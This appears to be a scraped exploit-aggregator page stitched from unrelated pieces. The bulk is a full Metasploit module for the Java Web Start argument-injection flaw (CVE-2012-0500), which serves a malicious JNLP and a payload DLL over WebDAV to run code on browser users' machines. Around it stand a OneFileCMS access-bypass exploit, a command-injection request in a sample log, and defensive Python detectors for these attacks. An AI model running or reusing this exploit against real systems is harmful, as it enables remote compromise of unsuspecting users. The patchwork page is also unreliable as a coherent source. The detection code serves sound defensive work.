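        m = _LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_target(m.group("target"))
        if reasons:
            findings.append((m.group("ip"), m.group("target"), reasons))
    return findings


# Constructed sample log: one normal call-me request, one injection attempt,
# one unrelated request. Addresses are private placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Mar/2012:10:15:02 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Mar/2012:10:16:44 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id%0D%0A%0D%0A HTTP/1.0" 200 512 "-" "-"
10.0.0.7 - - [23/Mar/2012:10:17:01 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(ip, target, "->", "; ".join(reasons))
```

Note that the injected request in the sample returns 200 just like the legitimate one, so status codes are no help here; the parameter contents are the only signal. The same `valid_callmenum` rule, applied before the value reaches the manager action, is the kind of check that closes the hole on the server side.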
-
OneFileCMS - Failure to Restrict URL Access
# Exploit Title: OneFileCMS - Failure to Restrict URL Access
# Date: 12th March 2012
# Author: Abhi M Balakrishnan
# Software Link: https://raw.github.com/rocktronica/OneFileCMS/f265961d0646890c9efe05b93983124abc18c56e/onefilecms.php
# Version: upto 1.1.4
# Tested on: Apache-2.2.17, PHP-5.2.17, MySQL-5.5.9, Windows 6.2
# Vulnerability Status: Fixed on version 1.1.5. Developer was very quick in responding to mails and to fix the issue. Bugfix version released within minutes after the notification. Great work.!!!
Commit: https://github.com/rocktronica/OneFileCMS/commit/a4e36213d9fe3efccc2f6730d29fd2a05c57594b
# Vulnerability: Failure to Restrict URL Access, since the redirection mechanism can be bypassed easily
# Exploit:
Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/
Step 2: Access http://example.com/path/admin.php
# PoC Video: http://www.youtube.com/watch?v=0lPz24Z7Q_4
-
-
Sun Java Web Start Plugin Command Line Argument Injection (2012)
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sun Java Web Start Plugin Command Line Argument Injection (2012)',
      'Description'    => %q{
        This module exploits a flaw in the Web Start component of the Sun Java
        Runtime Environment. The arguments passed to Java Web Start are not properly
        validated, allowing injection of arbitrary arguments to the JVM.

        By utilizing the lesser known -J option, an attacker can take advantage of
        the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method
        allows an attacker to execute arbitrary code in the context of an unsuspecting
        browser user.

        In order for this module to work, it must be ran as root on a server that
        does not serve SMB. Additionally, the target host must have the WebClient
        service (WebDAV Mini-Redirector) enabled.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'jduck', # Bug reported to Oracle by TELUS
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2012-0500' ],
          [ 'OSVDB', '79227' ],
          [ 'BID', '52015' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2012/Feb/251' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html' ]
        ],
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'          => 1024,
          'BadChars'       => '',
          'DisableNops'    => true,
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
          [ 'Java Runtime on Windows x86',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Feb 14 2012'
    ))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
        OptString.new('UNCPATH', [ false, 'Override the UNC path to use. (Use with an SMB server)' ])
      ], self.class)
  end

  def auto_target(cli, request)
    agent = request.headers['User-Agent']
    ret = nil

    #print_status("Agent: #{agent}")

    # Check for MSIE and/or WebDAV redirector requests
    if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/
      ret = targets[1]
    elsif agent =~ /MSIE (6|7|8)\.0/
      ret = targets[1]
    else
      print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
    end

    ret
  end

  def on_request_uri(cli, request)
    # For this exploit, this does little besides ensures the user agent is a recognized one..
    mytarget = target
    if target.name == 'Automatic'
      mytarget = auto_target(cli, request)
      if (not mytarget)
        send_not_found(cli)
        return
      end
    end

    # Special case to process OPTIONS for /
    if (request.method == 'OPTIONS' and request.uri == '/')
      process_options(cli, request, mytarget)
      return
    end

    # Discard requests for ico files
    if (request.uri =~ /\.ico$/i)
      send_not_found(cli)
      return
    end

    # If there is no subdirectory in the request, we need to redirect.
    if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//)
      if (request.uri == '/')
        subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
      else
        subdir = request.uri + '/'
      end
      print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
      send_redirect(cli, subdir)
      return
    else
      share_name = $1
    end

    # dispatch WebDAV requests based on method first
    case request.method
    when 'OPTIONS'
      process_options(cli, request, mytarget)
    when 'PROPFIND'
      process_propfind(cli, request, mytarget)
    when 'GET'
      process_get(cli, request, mytarget, share_name)
    when 'PUT'
      print_status("Sending 404 for PUT #{request.uri} ...")
      send_not_found(cli)
    else
      print_error("Unexpected request method encountered: #{request.method}")
    end
  end

  #
  # GET requests
  #
  def process_get(cli, request, target, share_name)
    print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")

    # dispatch based on extension
    if (request.uri =~ /\.dll$/i)
      #
      # DLL requests sent by IE and the WebDav Mini-Redirector
      #
      print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")

      # Re-generate the payload
      return if ((p = regenerate_payload(cli)) == nil)

      # Generate a DLL based on the payload
      dll_data = generate_payload_dll({ :code => p.encoded })

      # Send it
      send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })

    elsif (request.uri =~ /\.jnlp$/i)
      #
      # Send the jnlp document
      #

      # Prepare the UNC path...
      if (datastore['UNCPATH'])
        unc = datastore['UNCPATH'].dup
      else
        my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
        unc = "\\\\" + my_host + "\\" + share_name
      end

      # NOTE: we ensure there's only a single backslash here since it will get escaped
      if unc[0,2] == "\\\\"
        unc.slice!(0, 1)
      end

      http_agent = Rex::Text.rand_text_alpha(8+rand(8))

      jnlp_data = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<jnlp version="1">
  <information>
    <title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
    <vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
    <description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
  </information>
  <resources>
    <java version="1.3+" initial-heap-size='512m" -J-XXaltjvm=#{unc} "' />
  </resources>
  <resources><java java-vm-args='-Dhttp.agent=#{http_agent}"' /></resources>
</jnlp>
      EOS

      print_status("Sending JNLP to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, jnlp_data, { 'Content-Type' => 'application/x-java-jnlp-file' })

    else
      print_status("Sending redirect to the JNLP file to #{cli.peerhost}:#{cli.peerport}")
      jnlp_name = Rex::Text.rand_text_alpha(8 + rand(8))
      jnlp_path = get_resource()
      if jnlp_path[-1,1] != '/'
        jnlp_path << '/'
      end
      jnlp_path << request.uri.split('/')[-1] << '/'
      jnlp_path << jnlp_name << ".jnlp"
      send_redirect(cli, jnlp_path, '')
    end
  end

  #
  # OPTIONS requests sent by the WebDav Mini-Redirector
  #
  def process_options(cli, request, target)
    print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")

    headers = {
      #'DASL'   => '<DAV:sql>',
      #'DAV'    => '1, 2',
      'Allow'  => 'OPTIONS, GET, PROPFIND',
      'Public' => 'OPTIONS, GET, PROPFIND'
    }
    send_response(cli, '', headers)
  end

  #
  # PROPFIND requests sent by the WebDav Mini-Redirector
  #
  def process_propfind(cli, request, target)
    path = request.uri

    print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")

    body = ''

    if (path =~ /\.dll$/i)
      # Response for the DLL
      print_status("Sending DLL multistatus for #{path} ...")

      #<lp1:getcontentlength>45056</lp1:getcontentlength>
      body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag>
<lp2:executable>F</lp2:executable>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|

    elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
      # Response for anything else (generally just /)
      print_status("Sending directory multistatus for #{path} ...")

      body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|

    else
      print_status("Sending 404 for #{path} ...")
      send_not_found(cli)
      return
    end

    # send the response
    resp = create_response(207, "Multi-Status")
    resp.body = body
    resp['Content-Type'] = 'text/xml'
    cli.send_response(resp)
  end

  #
  # Make sure we're on the right port/path to support WebDAV
  #
  def exploit
    if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
      raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
    end

    super
  end
end
Sursa: Sun Java Web Start Plugin Command Line Argument Injection (2012)
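The JNLP the module serves smuggles a launcher option through an attribute that should only ever hold a heap size: `initial-heap-size='512m" -J-XXaltjvm=… "'` closes the quoted value early and appends `-J-XXaltjvm` pointing at a WebDAV share. The following is an added example (not Metasploit, Oracle or Java Web Start code) of a gateway-side check that flags JNLP documents whose `<java>`/`<j2se>` attributes contain characters or option prefixes that could escape the intended argument. Both sample documents are constructed here; the WebDAV hostname is a placeholder, and the choice of patterns is an assumption about what legitimate values look like (`64m`, `1.6+`, and so on). This is a compensating control for a proxy or mail filter; the fix itself is the Java update in the advisory the module references.

```python
import re
import xml.etree.ElementTree as ET

# Attribute values on <java>/<j2se> are handed to the launcher. Legitimate
# values look like "512m" or "1.6+"; anything that can close the quoted
# argument or smuggle a launcher/JVM flag is flagged (assumed rule set).
_SUSPECT = [
    (re.compile(r'["\s]'), "quote or whitespace in attribute value"),
    (re.compile(r"-J", re.I), "-J launcher option"),
    (re.compile(r"-XX", re.I), "-XX JVM option"),
    (re.compile(r"\\"), "backslash (UNC path) in attribute value"),
]
# java-vm-args legitimately contains spaces, but never quotes or altjvm.
_VM_ARGS_SUSPECT = [
    (re.compile(r'"'), "quote in java-vm-args"),
    (re.compile(r"altjvm|-J", re.I), "JVM substitution in java-vm-args"),
]
_RESOURCE_TAGS = {"java", "j2se"}


def inspect_jnlp(xml_text):
    """Return (tag, attribute, reason) findings for a JNLP document."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]  # drop any namespace prefix
        if tag not in _RESOURCE_TAGS:
            continue
        for name, value in elem.attrib.items():
            rules = _VM_ARGS_SUSPECT if name == "java-vm-args" else _SUSPECT
            for pattern, reason in rules:
                if pattern.search(value):
                    findings.append((tag, name, reason))
    return findings


def is_suspicious_jnlp(xml_text):
    """Boolean form for a block/allow decision at the gateway."""
    return bool(inspect_jnlp(xml_text))


# Constructed benign launcher: ordinary heap and version attributes.
BENIGN_JNLP = """<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+" codebase="https://app.example.invalid/" href="app.jnlp">
  <information><title>App</title><vendor>Example</vendor></information>
  <resources>
    <java version="1.6+" initial-heap-size="64m" max-heap-size="512m"/>
    <jar href="app.jar" main="true"/>
  </resources>
  <application-desc main-class="example.Main"/>
</jnlp>
"""

# Constructed document modelled on the module's output; the host is a placeholder.
INJECTING_JNLP = r"""<?xml version="1.0" encoding="UTF-8"?>
<jnlp version="1">
  <information><title>x</title><vendor>y</vendor><description>z</description></information>
  <resources>
    <java version="1.3+" initial-heap-size='512m" -J-XXaltjvm=\webdav-host.invalid\share "' />
  </resources>
  <resources><java java-vm-args='-Dhttp.agent=abcdefgh"' /></resources>
</jnlp>
"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_JNLP), ("injecting", INJECTING_JNLP)):
        print(label, is_suspicious_jnlp(doc))
        for finding in inspect_jnlp(doc):
            print("  ", finding)
```

The quote-or-whitespace rule alone catches this module's document, since the whole technique depends on closing the `initial-heap-size` value early; the `-J`/`-XX`/backslash rules are there so that a variant using a different attribute or encoding still trips at least one check.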
joomla component (com_ponygallery) SQL injection Vulnerability
in Exploits
Sursa: joomla component (com_ponygallery) SQL injection Vulnerability